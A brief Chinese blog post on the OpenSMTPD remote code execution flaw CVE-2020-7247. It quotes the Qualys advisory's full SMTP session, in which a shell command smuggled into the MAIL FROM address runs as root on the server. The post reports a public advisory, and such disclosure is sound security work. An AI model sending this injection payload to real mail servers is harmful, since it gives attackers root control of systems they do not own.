在「OpenBSD OpenSMTPD Remote Code Execution Vulnerability (CVE-2020-7247)」這邊看到頗意外的 OpenSMTPD RCE,而且從「Qualys Security Advisory LPE and RCE in OpenSMTPD (CVE-2020-7247)」這邊的範例可以看到是個淺顯易懂的 exploit:
$ nc 192.168.56.143 25 220 obsd66.example.org ESMTP OpenSMTPD HELO professor.falken 250 obsd66.example.org Hello professor.falken [192.168.56.1], pleased to meet you MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;> 250 2.0.0 Ok RCPT TO:<root@example.org> 250 2.1.5 Destination address valid: Recipient ok DATA 354 Enter mail, end with "." on a line by itself #0 #1 #2 #3 #4 #5 #6 #7 #8 #9 #a #b #c #d for i in W O P R; do echo -n "($i) " && id || break done >> /root/x."`id -u`"."$$" . 250 2.0.0 4cdd24df Message accepted for delivery QUIT 221 2.0.0 Bye
這樣有點歡樂...